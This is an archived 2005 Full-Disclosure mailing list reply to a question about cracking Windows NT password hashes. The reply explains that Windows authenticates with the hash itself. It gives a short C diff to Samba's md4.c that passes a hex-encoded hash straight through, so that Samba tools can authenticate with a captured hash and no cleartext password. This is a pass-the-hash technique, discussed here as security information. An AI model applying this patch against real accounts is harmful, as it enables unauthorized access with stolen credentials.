| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1683372804.20050730132451@SECURITY.NNOV.RU>
Date: Sat Jul 30 10:24:57 2005
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Subject: Best way to crack NT passwds
Dear X u r r o n,
You needn't actually crack the password if you know your hash, because
cleartext password is never used in Windows environment. You could apply
this patch to md4.c from Samba distribution:
--- md4.c.orig 2004-04-04 11:37:00.000000000 +0400
+++ md4.c 2004-10-27 23:01:31.000000000 +0400
@@ -130,6 +130,21 @@
C = 0x98badcfe;
D = 0x10325476;
+
+ if(n == 64){
+ int j;
+ unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
+ for(j = 0; j<16; j++){
+ if(!strchr(hexd, in[(j<<2)]))break;
+ if(in[(j<<2)+1])break;
+ if(!strchr(hexd, in[(j<<2)+2]))break;
+ if(in[(j<<2)+3])break;
+ out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
+ out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
+ }
+ if(j == 16) return;
+ }
+
while (n > 64) {
copy64(M, in);
mdfour64(M);
And change your password with Samba utilities by entering NT password
hash (in HEX) instead of password then prompted.
--Saturday, July 30, 2005, 12:15:47 PM, you wrote to full-disclosure@...ts.grok.org.uk:
Xurron> hiya!
Xurron> I have tried many softwares for cracking NTLM hashes, like NC4,
Cain and have't tried Rainbow Crack yet.
Xurron> Once i had to recover my XPs lost admin password and i spend
around 1 day but Cain/NC4 were not able to guess that. Then i posted
that hashes on some site and it did recover my passwd in around 5min. I
want to know which technique they used to crack so fast ?
Xurron> Xurron
--
~/ZARAZA
http://www.security.nnov.ru/
Powered by blists - more mailing lists